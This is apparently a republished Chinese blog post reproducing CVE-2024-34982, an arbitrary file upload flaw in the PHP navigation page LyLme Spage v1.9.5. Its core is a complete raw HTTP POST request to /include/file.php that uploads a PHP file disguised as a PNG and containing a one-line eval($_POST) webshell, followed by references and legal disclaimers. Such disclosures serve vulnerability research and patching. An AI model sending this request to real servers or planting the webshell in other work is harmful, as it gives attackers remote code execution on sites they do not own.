本人非原创漏洞作者,文章仅作为知识分享用
一切直接或间接由于本文所造成的后果与本人无关
如有侵权,联系删除
项目简介
六零导航页 (LyLme Spage) 致力于简洁高效无广告的上网导航和搜索入口,支持后台添加链接、自定义搜索引擎,沉淀最具价值链接,全站无商业推广,简约而不简单。
开发语言:PHP
项目地址:https://gitee.com/LyLme/lylme_spage/
空间测绘
关注公众号,回复“20240518”获取空间测绘语句
漏洞描述
lylme_spage v1.9.5 组件 /include/file.php 中存在任意文件上传漏洞,允许攻击者通过上传精心设计的文件来执行任意代码。
影响版本
lylme_spage v1.9.5
漏洞验证
POST /include/file.php HTTP/1.1
Host: xxx.xxx.xxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest
Origin: http://127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
Cookie: X8Kk_2132_logintime=1713010988; X8Kk_2132_saltkey=sb50OXyE; X8Kk_2132_lastvisit=1713007324; XDEBUG_SESSION=PHPSTORM; admin_hkcms_lang=zh-cn; index_hkcms_lang=zh-cn; HKCMSSESSID=e0594fc037c66b2dcc477b032c98de35; PHPSESSID=jbl3he9k1riq937d993fc7luhi; admin_token=32cffj4RQkD5uVfTy3J25h8COeBWUDMFyPZMgE%2BSw2eAI1O%2FgJsuTSHq0vIvSxsREnWeNg59eXDvZU%2F6gdzPT3acrQ
Content-Type: multipart/form-data; boundary=---------------------------207262699182048909098055515
Sec-Fetch-Mode: cors
Accept-Encoding: gzip, deflate, br
Sec-Fetch-Dest: empty
Sec-Fetch-Site: same-origin
Referer: http://127.0.0.1/apply/
Content-Length: 239
-----------------------------207262699182048909098055515
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png
eval($_POST['q']);
-----------------------------207262699182048909098055515--
参考链接
https://nvd.nist.gov/vuln/detail/CVE-2024-34982
https://github.com/n2ryx/CVE/blob/main/Lylme_pagev1.9.5.md
https://github.com/LyLme/lylme_spage
https://gitee.com/LyLme/lylme_spage/
关注公众号,回复“20240518”获取空间测绘语句
原文始发于微信公众号(不够安全):[漏洞复现] CVE-2024-34982 LyLme Spage六零导航页 文件上传
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论